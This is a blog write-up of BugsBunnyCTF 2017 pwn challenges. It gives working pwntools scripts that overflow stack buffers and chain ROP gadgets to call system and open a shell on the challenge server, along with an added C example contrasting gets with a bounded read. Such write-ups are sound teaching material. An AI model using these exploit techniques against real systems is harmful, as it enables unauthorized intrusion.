Chybeta

BugsBunnyCTF2017-pwn-writeup

Playing this one solo was hard work.

Pwn50

You look new here
so this is my gift for you
task : nc 54.153.19.139 5251
just write something when connect , its always UP
Author: TnMch

The binary uses gets, so there is an obvious overflow. The challenge binary also provides a call to system. The exploit:

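from pwn import *

r = remote("54.153.19.139", "5251")
# Local variable names as shown by the decompiler.
# 0x62, 0x75, 0x67 are ASCII 'b', 'u', 'g'.
v6 = 0x62
v7 = 0x75
v8 = 0x67
v9 = 0xDEFACED
# Distance from the start of the input buffer to v9.
offset = 0x28 - 0x10
# Bytes literals keep the payload valid on both Python 2 and Python 3.
payload = b'bug' + b'a' * (offset - 3) + p64(v9)
r.sendline(payload)
r.interactive()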
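To show why the unbounded read is the root cause and what the fix looks like, here is an added example (not code from the original write-up or from the challenge binary). It assumes the layout implied by `offset = 0x28 - 0x10`; the struct, the function names and the sample line are constructed for illustration.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Assumed model of the Pwn50 locals: input buffer at rbp-0x28, checked
 * value v9 at rbp-0x10, so v9 starts 0x18 bytes after the buffer. Using one
 * struct keeps every write inside a single object (well-defined C). */
struct frame {
    char     buf[0x18];
    uint64_t v9;
};

/* gets()-like read: the length of the line, not of buf, decides how much
 * is written (capped at the model's size so the demo stays in bounds). */
static void read_unbounded(struct frame *f, const unsigned char *line, size_t len) {
    memcpy(f, line, len < sizeof *f ? len : sizeof *f);
}

/* Hardened read with fgets() semantics: at most sizeof(buf)-1 bytes are
 * stored and the result is always NUL-terminated. */
static void read_bounded(struct frame *f, const unsigned char *line, size_t len) {
    size_t n = len < sizeof f->buf - 1 ? len : sizeof f->buf - 1;
    memcpy(f->buf, line, n);
    f->buf[n] = '\0';
}

/* Feed one constructed over-long line to either reader; return v9 afterwards. */
uint64_t v9_after(int bounded) {
    struct frame f;
    unsigned char line[sizeof f];
    uint64_t marker = 0xDEFACED;          /* value taken from the write-up */

    memset(&f, 0, sizeof f);
    memset(line, 'a', sizeof line);
    memcpy(line, "bug", 3);
    memcpy(line + offsetof(struct frame, v9), &marker, sizeof marker);

    if (bounded) read_bounded(&f, line, sizeof line);
    else         read_unbounded(&f, line, sizeof line);
    return f.v9;
}

int main(void) {
    printf("unbounded read: v9 = 0x%llx\n", (unsigned long long)v9_after(0));
    printf("bounded read:   v9 = 0x%llx\n", (unsigned long long)v9_after(1));
    return 0;
}
```

With the bounded read the adjacent variable keeps its original value, which is why replacing gets with a length-checked read removes this bug class.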

Since the buffer can be overflowed, the challenge can also be solved with ROP. The exploit:

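from pwn import *

r = remote("54.153.19.139", "5251")
elf = ELF("pwn50")
system_addr = elf.symbols['system']
# Addresses taken from the challenge binary.
binsh_addr = 0x0000000000400773
pop_rdi_ret_addr = 0x0000000000400743
# Padding up to the saved return address.
offset = 56
# Bytes literals keep the payload valid on both Python 2 and Python 3.
payload = b'a' * offset
payload += p64(pop_rdi_ret_addr)  # pop rdi; ret
payload += p64(binsh_addr)        # rdi = argument for system
payload += p64(system_addr)
r.sendline(payload)
r.interactive()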

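After getting in, I spent a long time looking for the flag. I assumed pwn50 was a file, but it finally turned out to be a directory. In future, a command can help with finding the flag: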

$ find / -name flag
find: '/root': Permission denied
/home/pwn50/flag
...

The final flag:

Bugs_Bunny{lool_cool_stuf_even_its_old!!!!!}

Pwn100

Try this , maybe little hard
task : nc 54.153.19.139 5252
Author: TnMch

pwn150

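Debugging in IDA shows that fgets reads 192 bytes, but the start of the buffer is only 50 bytes from rbp, so there is an overflow, and the program has no canary protection. The overflow offset is estimated as 0x50+8 = 88.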

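Debugging with gdb confirms the offset of 88. Because the program forks a new process, it is convenient to enter set follow-fork-mode parent at the start of the gdb session and then set breakpoints at the relevant places.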

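from pwn import *

elf = ELF('pwn150')
r = remote("54.153.19.139", "5253")
# Consume the banner and the prompt before sending anything.
print(r.recvuntil(b"UTC 2017"))
print(r.recvuntil(b"Send me your message here:"))
system_addr = elf.symbols['system']
# First occurrence of the bytes "sh" inside the binary.
sh_addr = next(elf.search(b'sh'))
# Gadget addresses taken from the challenge binary.
pop_rdi_ret_addr = 0x0000000000400883
pop_rsi_pop_r15_ret = 0x0000000000400881
# 0x50 bytes up to rbp plus 8 bytes of saved rbp.
offset = 88
payload = b'a' * offset
payload += p64(pop_rdi_ret_addr)  # pop rdi; ret
payload += p64(sh_addr)           # rdi = argument for system
payload += p64(system_addr)
r.send(payload)
r.interactive()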

The final flag:

$ ls
pwn150
$ cd pwn150
$ ls
flag
pwn150
$ cat flag
Bugs_Bunny{did_i_help_you_Solve_it!oHH_talk_to_hacker:D}

pwn300


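Title: BugsBunnyCTF2017-pwn-writeup

Author: chybeta

Published: July 30, 2017 - 07:07

Last updated: August 1, 2017 - 20:08

Original link: http://chybeta.github.io/2017/07/30/BugsBunnyCTF2017-pwn-writeup/

License: Attribution-NonCommercial-NoDerivatives 4.0 International. Please keep the original link and author when reposting.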